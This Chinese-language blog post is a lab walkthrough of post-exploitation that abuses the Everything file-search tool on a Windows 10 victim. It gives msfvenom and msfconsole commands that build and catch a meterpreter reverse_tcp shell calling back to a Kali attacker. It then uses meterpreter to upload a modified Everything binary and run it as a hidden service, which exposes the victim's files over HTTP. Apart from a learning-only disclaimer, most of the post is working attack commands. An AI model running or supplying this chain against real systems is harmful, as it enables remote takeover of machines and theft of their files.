Everything后渗透的利用

LocalConst.POST_MATHJAX = “”

0x00 Everything简介:

“Everything”是一个运行于Windows系统,基于文件、文件夹名称的快速搜索引擎。

“Everything”在搜索之前就会把所用的文件和文件夹都列出来,这一点与Windows自带的搜索系统不一样,所以我们称之为“Everything”。

在搜索框输入文字,它就会只显示过滤后的文件和目录。

0x01 搭建测试环境及配置Everything

测试环境

攻击机(kali)      192.168.41.132

被害机(win10)  192.168.41.129

Everything配置

建议服务器端口不与FTP和HTTP的默认端口相同

其中:

-install-client-service         安装客户服务

-start-client-service           启动服务

0x02 漏洞复现:

1、选用的win10环境,所以直接kali生成一个木马,上传exe(木马)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.41.132 lport=4444 -f exe -o /root/e.exe

msfconsole进行攻击,拿到shell

msf > use exploit/multi/handler     #加载模块

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp    #设置payloadmsf exploit(multi/handler) > set lhost kali的ip   #设置kali的ipmsf exploit(multi/handler) > set lport 1211   #设置kali的端口msf exploit(multi/handler) > exploit   #执行

2、上传已经修改好的everything

meterpreter > upload -r /root/Everything.exe c:windowstemp

meterpreter > upload -r /root/Everything.ini c:windowstemp

3、启动everything

execute -f ‘C:windowstempEverything.exe’ -a -install-client-service –H

execute -f ‘C:windowstempEverything.exe’ -a -start-client-service –H

4、访问168.41.129:8088->输入开始设置的everything的密码

最后说一句:“大佬”腻害~~慕了慕了

PS:本文仅供学习,可在虚拟机搭环境复现,勿用做非授权测试。。。

相关推荐: Python实现X-Ray自动化批量挖洞

0x01 前言 小白我看到一个脚本不错,可以使得原本没有批量扫描功能的X-Ray实现此功能,特别改了一些,使体验更好 0x02 过程 详细过程如下: 采集子域名 用朋友采集的子域名,来源是oneforall+jsfinder+fuzzer,保存为url.txt…


(adsbygoogle = window.adsbygoogle || []).push({});


最后修改:2021 年 04 月 27 日 06 : 28 PM

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论